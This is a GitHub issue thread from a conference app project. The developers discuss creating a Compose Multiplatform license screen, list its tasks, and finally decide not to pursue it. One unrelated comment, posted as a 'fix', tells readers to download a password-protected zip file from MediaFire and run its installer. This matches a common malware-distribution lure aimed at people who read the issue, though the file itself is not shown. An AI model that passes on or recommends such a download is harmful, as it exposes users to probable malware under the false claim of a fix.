### ISSUE TITLE
Create a License screen that can also be used with ComposeMultiplatform.

### ISSUE THREAD

**Issue by Corvus400** [DroidKaigi/conference-app-2024#813]
# Why is this necessary?

- OssLicensesMenuActivity is for Android and cannot be used with Composable Multiplatform as is.

## The following is an overview of the list of tasks required to complete the task.

1. [ ] Create feature:license module.
2. [ ] Create License list screen.
3. [ ] Create components for the license list screen.
4. [ ] Creation of License detail screen that transitions from License list screen.
5. [ ] Install the libraries described in the Link section.
6. [ ] Creation of Data layer to handle artifacts.json provided by the library.
7. [ ] Display the License list and License detail screen using the data provided by the Data layer.
8. [ ] Create VRT for License list screen and detail screen.
9. [ ] If necessary, we will create a design proposal and modify the screen according to the design.

### Link

- [Referenced information](https://kaleidot.net/2023/09/compose-multiplatform%E3%81%A7oss%E3%83%A9%E3%82%A4%E3%82%BB%E3%83%B3%E3%82%B9%E8%A1%A8%E7%A4%BA%E3%82%92%E4%BD%9C%E3%82%8B/)
- [Library URL](https://github.com/cashapp/licensee)

**Comment by Corvus400** [comment]
@takahirom 
I've been thinking about the task.
If you know of an easier way to accomplish this, I would like to follow the task accordingly.  🙇

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Corvus400** [comment]
@takahirom 
I will try to see if I can't use the existing iOS code to handle the part of the code that opens the license screen.
However, to show the potential of Compose Multiplatform, I will try to implement the described procedure once the existing license screen can be displayed. 🫡

**Comment by takahirom** [comment]
I think it is finished. Let me know if I'm wrong.

**Comment by Corvus400** [comment]
@takahirom 
If you do not need to use the same license screen for Android/iOS, then you are done. :saluting_face: 
If you do this task, you will have the advantage of using a common screen for iOS and Android.
However, there is a concern that if we execute this task, we do not know if we can make CI pass the task as long as we treat JSON as an artifact. :thinking:

**Comment by takahirom** [comment]
I think creating a screen is not that difficult, but generating license information for both iOS and Android libraries would be challenging.

**Comment by Corvus400** [comment]
There are still some major issues with Compose Multiplatform, so I'm going to focus on solving those issues and not do this task this time. 🫡
